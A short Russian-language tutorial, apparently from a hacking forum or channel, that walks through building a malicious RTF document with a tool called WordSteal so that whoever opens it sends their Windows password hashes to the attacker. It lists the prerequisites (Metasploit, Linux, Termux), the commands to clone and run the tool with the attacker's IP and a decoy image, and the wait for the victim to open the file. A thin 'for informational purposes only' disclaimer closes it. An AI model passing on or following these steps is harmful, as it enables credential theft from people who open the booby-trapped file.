Привет, хакеры, задумывались ли вы, что при скачивании и открытии какого-либо документа, там вас может ожидать неприятная ситуация, а точнее - вирус? Если нет, то время начать проверять даже документы, а то 21 век на дворе.

А сегодня я наглядно покажу, как можно мошенники вшивают стиллер в RTF файл, с помощью утилиты WordSteal.

Когда юзер откроет такой файл, то "хакер" автоматически получает хеши паролей Виндоус.

Инструкция

1. Для начала вам потребуется

Metasploit, Linux, Termux

2. После запускаем нашу утилиту:

• apt install python git

• git clone https://github.com/0...L/WordSteal.git

• cd

• chmod +x main.py

3. После запуска вам понадобится какая-либо картинка. Вы должны прописать к ней абсолютный путь, либо же засунуть её в папку с скриптом и написать только её название:

• python main.py ваш_IP название_картинки 1

Пример:

• python main.py 128.0.0.1 kredo.jpg 1

Если всё прошло успешно, то в папке должен появится RTF с вшитой полезной нагрузкой. Терминал не нужно закрывать!

Далее этот файл должен кто-то открыть и в наш терминал придут все хеши паролей!

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.